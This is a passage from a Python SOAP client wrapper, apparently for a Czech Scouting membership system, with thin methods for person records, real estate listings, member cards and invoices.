return self._client.service.AdvertisingSummary({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits, "ID_Realty": ID_Realty, "Distance": Distance, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude})
# Upravit náborové informace
def AdvertisingUpdate(self, ID_Login, ID, ID_Unit, IsWater, Unit=None, RegistrationNumber=None, ID_UnitType=None, UnitType=None, Note=None):
return self._client.service.AdvertisingUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "IsWater": IsWater, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "Note": Note})
# Načíst seznam zaměření
def AlignmentAll(self, ID_Login, ID_Application, ID_Unit, ID_AlignmentType, ShowHistory, IsValid):
return self._client.service.AlignmentAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_AlignmentType": ID_AlignmentType, "ShowHistory": ShowHistory, "IsValid": IsValid})
# Načíst detail zaměření
def AlignmentDetail(self, ID_Login, ID):
return self._client.service.AlignmentDetail({"ID_Login": ID_Login, "ID": ID})
# Založit zaměření
def AlignmentInsert(self, ID_Login, ID, ID_Unit, ValidFrom, ValidTo, ID_AlignmentType, Unit=None, AlignmentType=None, ColorMargin=None, ColorCenter=None):
return self._client.service.AlignmentInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_AlignmentType": ID_AlignmentType, "Unit": Unit, "AlignmentType": AlignmentType, "ColorMargin": ColorMargin, "ColorCenter": ColorCenter})
# Načíst seznam zaměření
def AlignmentTypeAll(self, ID_Login, DisplayName=None):
return self._client.service.AlignmentTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Upravit zaměření
def AlignmentUpdate(self, ID_Login, ID, ID_Unit, ValidFrom, ValidTo, ID_AlignmentType, Unit=None, AlignmentType=None, ColorMargin=None, ColorCenter=None):
return self._client.service.AlignmentUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_AlignmentType": ID_AlignmentType, "Unit": Unit, "AlignmentType": AlignmentType, "ColorMargin": ColorMargin, "ColorCenter": ColorCenter})
# Načíst seznam zdravotních pojišťoven
def AssuranceAll(self, ID_Login, ID_Application, DisplayName=None):
return self._client.service.AssuranceAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "DisplayName": DisplayName})
# Načíst seznam bank
def BankAll(self, ID_Login, DisplayName=None, Code=None):
return self._client.service.BankAll({"ID_Login": ID_Login, "DisplayName": DisplayName, "Code": Code})
# Načíst detail banky
def BankDetail(self, ID_Login, ID):
return self._client.service.BankDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam typů kontaktů
def ContactTypeAll(self, ID_Login, IsForPerson, IsForUnit, DisplayName=None, ID=None):
return self._client.service.ContactTypeAll({"ID_Login": ID_Login, "IsForPerson": IsForPerson, "IsForUnit": IsForUnit, "DisplayName": DisplayName, "ID": ID})
# Načíst seznam vzdělávacích akcí
def EducatationSeminaryAll(self, ID_Login, ID_Person, DisplayName=None):
return self._client.service.EducatationSeminaryAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "DisplayName": DisplayName})
# Smazat vzdělávací akci
def EducatationSeminaryDelete(self, ID_Login, ID):
return self._client.service.EducatationSeminaryDelete({"ID_Login": ID_Login, "ID": ID})
# Založit vzdělávací akci
def EducatationSeminaryInsert(self, ID_Login, ID_Person, ID, YearFrom, DisplayName=None, Note=None):
return self._client.service.EducatationSeminaryInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "YearFrom": YearFrom, "DisplayName": DisplayName, "Note": Note})
# Upravit vzdělávací akci
def EducatationSeminaryUpdate(self, ID_Login, ID_Person, ID, YearFrom, DisplayName=None, Note=None):
return self._client.service.EducatationSeminaryUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "YearFrom": YearFrom, "DisplayName": DisplayName, "Note": Note})
# Načíst seznam osob členem kandidátní komise
def PersonAllEventCongressFunction(self, ID_Login, ID, ID_EventCongressFunction, DisplayName=None):
return self._client.service.PersonAllEventCongressFunction({"ID_Login": ID_Login, "ID": ID, "ID_EventCongressFunction": ID_EventCongressFunction, "DisplayName": DisplayName})
# Načíst detail dalších údajů osoby
def PersonOtherDetail(self, ID_Login, ID):
return self._client.service.PersonOtherDetail({"ID_Login": ID_Login, "ID": ID})
# Upravit další údaje osoby
def PersonOtherUpdate(self, ID_Login, ID, ID_Person, ID_DistrictBirth, ID_Assurance, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, DateChangeSocialNetwork, DateChangeMarketing, DateChangeDataStorage, DateChangeAudiovisual, IsRPS, IsEPS, IsEduParticipantExt, OnlyValidate, ID_EventCongress, ID_TempFileHealth, ID_DocumentHealth, IdCardValidTo, IsAdult, BirthCity=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, Person=None, MaidenName=None, DistrictBirth=None, Assurance=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Note=None, ParentNote=None, IdCardNumber=None):
return self._client.service.PersonOtherUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_DistrictBirth": ID_DistrictBirth, "ID_Assurance": ID_Assurance, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "DateChangeSocialNetwork": DateChangeSocialNetwork, "DateChangeMarketing": DateChangeMarketing, "DateChangeDataStorage": DateChangeDataStorage, "DateChangeAudiovisual": DateChangeAudiovisual, "IsRPS": IsRPS, "IsEPS": IsEPS, "IsEduParticipantExt": IsEduParticipantExt, "OnlyValidate": OnlyValidate, "ID_EventCongress": ID_EventCongress, "ID_TempFileHealth": ID_TempFileHealth, "ID_DocumentHealth": ID_DocumentHealth, "IdCardValidTo": IdCardValidTo, "IsAdult": IsAdult, "BirthCity": BirthCity, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "Person": Person, "MaidenName": MaidenName, "DistrictBirth": DistrictBirth, "Assurance": Assurance, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Note": Note, "ParentNote": ParentNote, "IdCardNumber": IdCardNumber})
# Načíst detail potvrzení o studiu pro osobu
def PersonSchoolDetailPerson(self, ID_Login, ID_Person):
return self._client.service.PersonSchoolDetailPerson({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Upravit údaje k potvrzení o studiu
def PersonSchoolUpdateSchool(self, ID_Login, ID, ID_Person, DateCreate, ID_TempFile, ID_PersonSchoolTempFile, ID_DocumentPhoto, ID_DocumentScan, Person=None, DisplayName=None, City=None, Extension=None, Scan=None, PhotoExtension=None, Photo=None):
return self._client.service.PersonSchoolUpdateSchool({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "DateCreate": DateCreate, "ID_TempFile": ID_TempFile, "ID_PersonSchoolTempFile": ID_PersonSchoolTempFile, "ID_DocumentPhoto": ID_DocumentPhoto, "ID_DocumentScan": ID_DocumentScan, "Person": Person, "DisplayName": DisplayName, "City": City, "Extension": Extension, "Scan": Scan, "PhotoExtension": PhotoExtension, "Photo": Photo})
# Editace osoby
def PersonDeletePhoto(self, ID_Login, ID):
return self._client.service.PersonDeletePhoto({"ID_Login": ID_Login, "ID": ID})
# Změna údajů osoby
def PersonUpdatePersonChange(self, ID_Login, ID_Application, Code, Birthday, BirthdayYear, IsForeign, YearFrom, ID_User, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, RejectDataStorage, IdentificationCodeForce, GenerateSecurityCode, ID_TempFile, ID_PersonPhotoBig, ID_PersonPhotoMedium, ID_PersonPhotoNormal, ID_PersonPhotoSmall, IdentificationCode=None, FirstName=None, LastName=None, NickName=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, ID_Sex=None, RegistrationNumber=None, PhotoExtension=None, PhotoContent=None, MaidenName=None, AddressDistrict=None, PostalDistrict=None, UnitEnrollExtension=None, UnitEnroll=None):
return self._client.service.PersonUpdatePersonChange({"ID_Login": ID_Login, "ID_Application": ID_Application, "Code": Code, "Birthday": Birthday, "BirthdayYear": BirthdayYear, "IsForeign": IsForeign, "YearFrom": YearFrom, "ID_User": ID_User, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "RejectDataStorage": RejectDataStorage, "IdentificationCodeForce": IdentificationCodeForce, "GenerateSecurityCode": GenerateSecurityCode, "ID_TempFile": ID_TempFile, "ID_PersonPhotoBig": ID_PersonPhotoBig, "ID_PersonPhotoMedium": ID_PersonPhotoMedium, "ID_PersonPhotoNormal": ID_PersonPhotoNormal, "ID_PersonPhotoSmall": ID_PersonPhotoSmall, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "ID_Sex": ID_Sex, "RegistrationNumber": RegistrationNumber, "PhotoExtension": PhotoExtension, "PhotoContent": PhotoContent, "MaidenName": MaidenName, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "UnitEnrollExtension": UnitEnrollExtension, "UnitEnroll": UnitEnroll})
# Načíst seznam nových kvalifikací v daném období
def QualificationAllNew(self, ID_Login, From, To, ID_QualificationTypeList=None):
return self._client.service.QualificationAllNew({"ID_Login": ID_Login, "From": From, "To": To, "ID_QualificationTypeList": ID_QualificationTypeList})
# Načíst názvy typů kvalifikace ze zadaného seznamu
def QualificationTypeAllList(self, ID_Login, ID_QualificationTypeList=None):
return self._client.service.QualificationTypeAllList({"ID_Login": ID_Login, "ID_QualificationTypeList": ID_QualificationTypeList})
# Načíst seznam nemovitostí pro soubor nemovitostí
def RealtyAllRealtyTypeCountPublic(self, ID_Login, ID_Application):
return self._client.service.RealtyAllRealtyTypeCountPublic({"ID_Login": ID_Login, "ID_Application": ID_Application})
# Přepočet blízkých bodů
def RealtyCollectionGroupByPosition(self, ID_Login):
return self._client.service.RealtyCollectionGroupByPosition({"ID_Login": ID_Login})
# Načíst seznam půjčitelných nemovitostí/souboru nemovitostí
def RealtyCollectionAllBorrowable(self, ID_Application, ID_Login, GpsLatitude, GpsLongitude, Distance, Price, Date, Capacity, BorrowableForeign, DisplayName=None, RegionList=None, DistrictList=None, City=None, Unit=None, OwnerTypeList=None, RealtyTypeList=None, OccupationEquipmentList=None, RealtyCollectionLocationList=None, PriceType=None, OccupationLanguageList=None, OccupationTagList=None):
return self._client.service.RealtyCollectionAllBorrowable({"ID_Application": ID_Application, "ID_Login": ID_Login, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "Distance": Distance, "Price": Price, "Date": Date, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "DisplayName": DisplayName, "RegionList": RegionList, "DistrictList": DistrictList, "City": City, "Unit": Unit, "OwnerTypeList": OwnerTypeList, "RealtyTypeList": RealtyTypeList, "OccupationEquipmentList": OccupationEquipmentList, "RealtyCollectionLocationList": RealtyCollectionLocationList, "PriceType": PriceType, "OccupationLanguageList": OccupationLanguageList, "OccupationTagList": OccupationTagList})
# Načíst seznam souborů nemovitostí
def RealtyCollectionAll(self, ID_Login, ID_Unit, ID, ID_User, DisplayName=None):
return self._client.service.RealtyCollectionAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_User": ID_User, "DisplayName": DisplayName})
# Načíst detail půjčitelné nemovitosti/souboru nemovitostí
def RealtyCollectionDetailBorrowable(self, ID_Application, ID, ID_Login):
return self._client.service.RealtyCollectionDetailBorrowable({"ID_Application": ID_Application, "ID": ID, "ID_Login": ID_Login})
# Načíst detail souboru nemovitostí
def RealtyCollectionDetailPhoto(self, ID_TempFilePhoto, ID_Login, ID, ID_Unit, ID_User, IsActive, GpsLatitude, GpsLongitude, HasAddress, ID_Region, ID_Document, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, Unit=None, UnitRegistrationNumber=None, Owner=None, DisplayName=None, Description=None, Web=None, Street=None, City=None, Postcode=None, District=None, TransportationMethods=None, TransportationMethodsText=None, TransportDescription=None, Locations=None, LocationsText=None, PointsOfInterest=None, Note=None, Region=None, Storage=None):
return self._client.service.RealtyCollectionDetailPhoto({"ID_TempFilePhoto": ID_TempFilePhoto, "ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_User": ID_User, "IsActive": IsActive, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "HasAddress": HasAddress, "ID_Region": ID_Region, "ID_Document": ID_Document, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber, "Owner": Owner, "DisplayName": DisplayName, "Description": Description, "Web": Web, "Street": Street, "City": City, "Postcode": Postcode, "District": District, "TransportationMethods": TransportationMethods, "TransportationMethodsText": TransportationMethodsText, "TransportDescription": TransportDescription, "Locations": Locations, "LocationsText": LocationsText, "PointsOfInterest": PointsOfInterest, "Note": Note, "Region": Region, "Storage": Storage})
# Založit soubor nemovitostí
def RealtyCollectionInsert(self, ID_TempFilePhoto, RealtyIsPower, ID_RealtyTempFilePhoto, ID_Login, ID_Unit, ID_User, HasAddress, GpsLatitude, GpsLongitude, LVNumber, Acreage, FotogalleryUrl=None, RealtyDisplayName=None, RealtyDescription=None, RealtyFotogalleryUrl=None, ID_RealtyOwnerType=None, RealtyOwnerTypeNote=None, RealtyNote=None, ID_RealtyRegisterType=None, DisplayName=None, Description=None, Web=None, Street=None, City=None, Postcode=None, District=None, TransportationMethods=None, TransportDescription=None, PointsOfInterest=None, Locations=None, Note=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None):
return self._client.service.RealtyCollectionInsert({"ID_TempFilePhoto": ID_TempFilePhoto, "RealtyIsPower": RealtyIsPower, "ID_RealtyTempFilePhoto": ID_RealtyTempFilePhoto, "ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_User": ID_User, "HasAddress": HasAddress, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "LVNumber": LVNumber, "Acreage": Acreage, "FotogalleryUrl": FotogalleryUrl, "RealtyDisplayName": RealtyDisplayName, "RealtyDescription": RealtyDescription, "RealtyFotogalleryUrl": RealtyFotogalleryUrl, "ID_RealtyOwnerType": ID_RealtyOwnerType, "RealtyOwnerTypeNote": RealtyOwnerTypeNote, "RealtyNote": RealtyNote, "ID_RealtyRegisterType": ID_RealtyRegisterType, "DisplayName": DisplayName, "Description": Description, "Web": Web, "Street": Street, "City": City, "Postcode": Postcode, "District": District, "TransportationMethods": TransportationMethods, "TransportDescription": TransportDescription, "PointsOfInterest": PointsOfInterest, "Locations": Locations, "Note": Note, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType})
# Načíst detail nemovitosti
def RealtyDetailPhoto(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
return self._client.service.RealtyDetailPhoto({"ID_Login": ID_Login, "ID": ID, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "ID_RealtyCollection": ID_RealtyCollection, "IsPower": IsPower, "ValidTo": ValidTo, "IsActive": IsActive, "ID_TempFilePhoto": ID_TempFilePhoto, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_Document": ID_Document, "LVNumber": LVNumber, "Acreage": Acreage, "RealtyGpsLatitude": RealtyGpsLatitude, "RealtyGpsLongitude": RealtyGpsLongitude, "CoordinateX": CoordinateX, "CoordinateY": CoordinateY, "DisplayName": DisplayName, "RealtyType": RealtyType, "Street": Street, "City": City, "Postcode": Postcode, "Description": Description, "Note": Note, "RealtyCollection": RealtyCollection, "ID_OwnerType": ID_OwnerType, "OwnerType": OwnerType, "OwnerTypeNote": OwnerTypeNote, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "District": District, "Storage": Storage, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber})
# Smazat dokument
def RealtyDocumentDelete(self, ID_Login, ID):
return self._client.service.RealtyDocumentDelete({"ID_Login": ID_Login, "ID": ID})
# No documentation
def RealtyDocumentDetail(self, ID_Login, ID):
return self._client.service.RealtyDocumentDetail({"ID_Login": ID_Login, "ID": ID})
# Stáhnout dokument
def RealtyDocumentDownload(self, ID_Login, ID):
return self._client.service.RealtyDocumentDownload({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam členských karet
def MemberCardAllMemberCardInvoice(self, ID_Login, ID_MemberCardInvoice):
return self._client.service.MemberCardAllMemberCardInvoice({"ID_Login": ID_Login, "ID_MemberCardInvoice": ID_MemberCardInvoice})
# Načíst seznam členských karet pro jednotku
def MemberCardAllUnit(self, ID_Login, ID_Unit, ID, IncludeChild, DisplayName=None, ID_MemberCardType=None, OnlyValid=None, PersonWithoutMeberCard=None, ValidTo=None, OnlyInvalid=None):
return self._client.service.MemberCardAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "IncludeChild": IncludeChild, "DisplayName": DisplayName, "ID_MemberCardType": ID_MemberCardType, "OnlyValid": OnlyValid, "PersonWithoutMeberCard": PersonWithoutMeberCard, "ValidTo": ValidTo, "OnlyInvalid": OnlyInvalid})
# Načíst všechny faktury za členské karty
def MemberCardInvoiceAll(self, ID_Login, ID_Unit, ID, ID_MemberCardInvoiceGenerate, DateGeneratingFrom, DateGeneratingTo, DisplayName=None, ID_MemberCardInvoiceState=None):
return self._client.service.MemberCardInvoiceAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_MemberCardInvoiceGenerate": ID_MemberCardInvoiceGenerate, "DateGeneratingFrom": DateGeneratingFrom, "DateGeneratingTo": DateGeneratingTo, "DisplayName": DisplayName, "ID_MemberCardInvoiceState": ID_MemberCardInvoiceState})
# Načíst detail faktury za členské karty
def MemberCardInvoiceDetail(self, ID_Login, ID):
return self._client.service.MemberCardInvoiceDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam generování faktur za členské karty
def MemberCardInvoiceGenerateAll(self, ID_Login, ID, ID_Person, ID_Error, ID_MemberCardInvoiceGenerateState=None):
return self._client.service.MemberCardInvoiceGenerateAll({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Error": ID_Error, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState})
# Založit generování faktur za členské karty
def MemberCardInvoiceGenerateInsert(self, ID_Login, ID, DateGenerating, ID_Person, ID_Error, Person=None, ID_MemberCardInvoiceGenerateState=None, MemberCardInvoiceGenerateState=None, Error=None):
return self._client.service.MemberCardInvoiceGenerateInsert({"ID_Login": ID_Login, "ID": ID, "DateGenerating": DateGenerating, "ID_Person": ID_Person, "ID_Error": ID_Error, "Person": Person, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState, "MemberCardInvoiceGenerateState": MemberCardInvoiceGenerateState, "Error": Error})
# Upravit generování faktur za členské karty
def MemberCardInvoiceGenerateUpdate(self, ID_Login, ID, DateGenerating, ID_Person, ID_Error, Person=None, ID_MemberCardInvoiceGenerateState=None, MemberCardInvoiceGenerateState=None, Error=None):
return self._client.service.MemberCardInvoiceGenerateUpdate({"ID_Login": ID_Login, "ID": ID, "DateGenerating": DateGenerating, "ID_Person": ID_Person, "ID_Error": ID_Error, "Person": Person, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState, "MemberCardInvoiceGenerateState": MemberCardInvoiceGenerateState, "Error": Error})
# Vygenerovat faktury
def MemberCardInvoiceGenerateUpdateGenerate(self, ID_Login, ID, DateGenerating, ID_Person, ID_Error, Person=None, ID_MemberCardInvoiceGenerateState=None, MemberCardInvoiceGenerateState=None, Error=None):
return self._client.service.MemberCardInvoiceGenerateUpdateGenerate({"ID_Login": ID_Login, "ID": ID, "DateGenerating": DateGenerating, "ID_Person": ID_Person, "ID_Error": ID_Error, "Person": Person, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState, "MemberCardInvoiceGenerateState": MemberCardInvoiceGenerateState, "Error": Error})
# Načíst seznam stavů faktury za členské karty
def MemberCardInvoiceStateAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.MemberCardInvoiceStateAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Aktivuje karty podkladů pro tisk karet
def MemberCardPrintActivate(self, ID_Login, ID, ValidFrom):
return self._client.service.MemberCardPrintActivate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom})
# Přidá karty do podkladu pro tisk karet
def MemberCardPrintAddCards(self, ID_Login, ID):
return self._client.service.MemberCardPrintAddCards({"ID_Login": ID_Login, "ID": ID})
# Načíst detail podkladu pro tisk karty
def MemberCardPrintDetail(self, ID_Login, ID):
return self._client.service.MemberCardPrintDetail({"ID_Login": ID_Login, "ID": ID})
# Generování souboru s podklady pro tisk karet
def MemberCardPrintUpdateGenerating(self, ID_Login, ID):
return self._client.service.MemberCardPrintUpdateGenerating({"ID_Login": ID_Login, "ID": ID})
# Ukončit platnost prošlých karet
def MemberCardUpdateExpired(self, ID_Login):
return self._client.service.MemberCardUpdateExpired({"ID_Login": ID_Login})
# Načíst seznam členství osob v jednotce pro zařazení do google skupiny
def MembershipAllGoogleGroup(self, ID_Login, ID_GoogleGroup, OnlyDirectMember, Person=None):
return self._client.service.MembershipAllGoogleGroup({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup, "OnlyDirectMember": OnlyDirectMember, "Person": Person})
# Načíst seznam užívání nemovitosti
def OccupationAllRealtyCollection(self, ID_Login, ID_RealtyCollection, IsActive, IsBorrowable, ID_Application):
return self._client.service.OccupationAllRealtyCollection({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection, "IsActive": IsActive, "IsBorrowable": IsBorrowable, "ID_Application": ID_Application})
# Načíst seznam majetkových vztahů
def OwnerTypeAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
return self._client.service.OwnerTypeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Načíst osoby podle mailů členů google skupiny
def PersonAllGoogleGroup(self, ID_Login, ID_GoogleGroup):
return self._client.service.PersonAllGoogleGroup({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup})
# Vrátí
def PersonAllJournalRover(self, ID_Login, Unit_ID):
return self._client.service.PersonAllJournalRover({"ID_Login": ID_Login, "Unit_ID": Unit_ID})
# Načíst počet vydaných karet za jednotlivé roky
def MemberCardAllSummary(self, ID_Login):
return self._client.service.MemberCardAllSummary({"ID_Login": ID_Login})
# Zneplatnit email osoby nebo jednotky
def ContactUpdateInvalid(self, ID_Login, Mail=None):
return self._client.service.ContactUpdateInvalid({"ID_Login": ID_Login, "Mail": Mail})
# Načíst seznam podkladů pro tisk karet
def MemberCardPrintAll(self, ID_Login, ID, ID_MemberCardPrintState=None):
return self._client.service.MemberCardPrintAll({"ID_Login": ID_Login, "ID": ID, "ID_MemberCardPrintState": ID_MemberCardPrintState})
# Stáhnout soubor s podklady pro tisk karet
def MemberCardPrintDetailDownload(self, ID_Login, ID):
return self._client.service.MemberCardPrintDetailDownload({"ID_Login": ID_Login, "ID": ID})
# Založit podklad pro tisk karet
def MemberCardPrintInsert(self, ID_Login, ID, DateCreate, DateGenerated, Count, ID_MemberCardPrintState=None, MemberCardPrintState=None, Error=None):
return self._client.service.MemberCardPrintInsert({"ID_Login": ID_Login, "ID": ID, "DateCreate": DateCreate, "DateGenerated": DateGenerated, "Count": Count, "ID_MemberCardPrintState": ID_MemberCardPrintState, "MemberCardPrintState": MemberCardPrintState, "Error": Error})
# Pozadavek na opetovne vygenerovani souboru s podklady pro tisk
def MemberCardPrintUpdateGenerate(self, ID_Login, ID, ValidFrom, ValidTo):
return self._client.service.MemberCardPrintUpdateGenerate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo})
# Definitivni smazani docasne oznacenych osob
def PersonDeleteInactive(self, ID_Login):
return self._client.service.PersonDeleteInactive({"ID_Login": ID_Login})
# Načtení informací o osobě
def PersonDetailHomepage(self, ID_Login, ID):
return self._client.service.PersonDetailHomepage({"ID_Login": ID_Login, "ID": ID})
# Načíst detail přihlášku osoby
def PersonOtherDetailUnitEnroll(self, ID_Login, ID, LoadUnitEnroll):
return self._client.service.PersonOtherDetailUnitEnroll({"ID_Login": ID_Login, "ID": ID, "LoadUnitEnroll": LoadUnitEnroll})
# Smazat citlivé údaje
def PersonOtherUpdateClear(self, ID_Login):
return self._client.service.PersonOtherUpdateClear({"ID_Login": ID_Login})
# Update the withdrawal of consents on a person's application.
def PersonOtherUpdateReject(self, ID_Login, ID, ID_Person, ID_DistrictBirth, ID_Assurance, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, DateChangeSocialNetwork, DateChangeMarketing, DateChangeDataStorage, DateChangeAudiovisual, IsRPS, IsEPS, IsEduParticipantExt, OnlyValidate, ID_EventCongress, ID_TempFileHealth, ID_DocumentHealth, IdCardValidTo, IsAdult, BirthCity=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, Person=None, MaidenName=None, DistrictBirth=None, Assurance=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Note=None, ParentNote=None, IdCardNumber=None):
    """Record withdrawal of consents from a person's application.

    Every keyword of the SOAP request maps 1:1 onto a parameter, so the
    payload is taken directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.PersonOtherUpdateReject(args)
# Update a person's unit-enrollment application.
def PersonOtherUpdateUnitEnroll(self, ID_Login, ID, ID_UnitEnrollTempFile, UnitEnrollExtension=None):
    """Attach/update the enrollment-application file of a person."""
    args = dict(locals())
    del args["self"]
    return self._client.service.PersonOtherUpdateUnitEnroll(args)
# Confirm a person's unit-enrollment application.
def PersonOtherUpdateUnitEnrollCondition(self, ID_Login, ID, ID_Person, ID_DistrictBirth, ID_Assurance, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, DateChangeSocialNetwork, DateChangeMarketing, DateChangeDataStorage, DateChangeAudiovisual, IsRPS, IsEPS, IsEduParticipantExt, OnlyValidate, ID_EventCongress, ID_TempFileHealth, ID_DocumentHealth, IdCardValidTo, IsAdult, BirthCity=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, Person=None, MaidenName=None, DistrictBirth=None, Assurance=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Note=None, ParentNote=None, IdCardNumber=None):
    """Confirm a person's enrollment application.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.PersonOtherUpdateUnitEnrollCondition(args)
# Download a qualification certificate.
def PersonQualificationLetterDownload(self, ID_Login, ID_Qualification):
    """Download the certificate letter of a person's qualification."""
    args = dict(locals())
    del args["self"]
    return self._client.service.PersonQualificationLetterDownload(args)
# Edit the crop of a person's photo.
def PersonUpdatePhotoSize(self, ID_Login, ID, PhotoX, PhotoY, PhotoSize):
    """Update the crop rectangle of a person's photo."""
    args = dict(locals())
    del args["self"]
    return self._client.service.PersonUpdatePhotoSize(args)
# Load the count of member card requests.
def MemberCardAllRequestCount(self, ID_Login):
    """Get the number of member-card requests."""
    args = dict(locals())
    del args["self"]
    return self._client.service.MemberCardAllRequestCount(args)
# Load the list of member cards ready for issue.
def MemberCardAllRequest(self, ID_Login, ID_MemberCardPrint):
    """List member cards prepared for issue in a print batch."""
    args = dict(locals())
    del args["self"]
    return self._client.service.MemberCardAllRequest(args)
# Check a member card's validity by its number.
def MemberCardDetailValid(self, ID_Login, ID_Application, BitOutput, DisplayName=None):
    """Check a member card's validity by its card number."""
    args = dict(locals())
    del args["self"]
    return self._client.service.MemberCardDetailValid(args)
# Invalidate a member card.
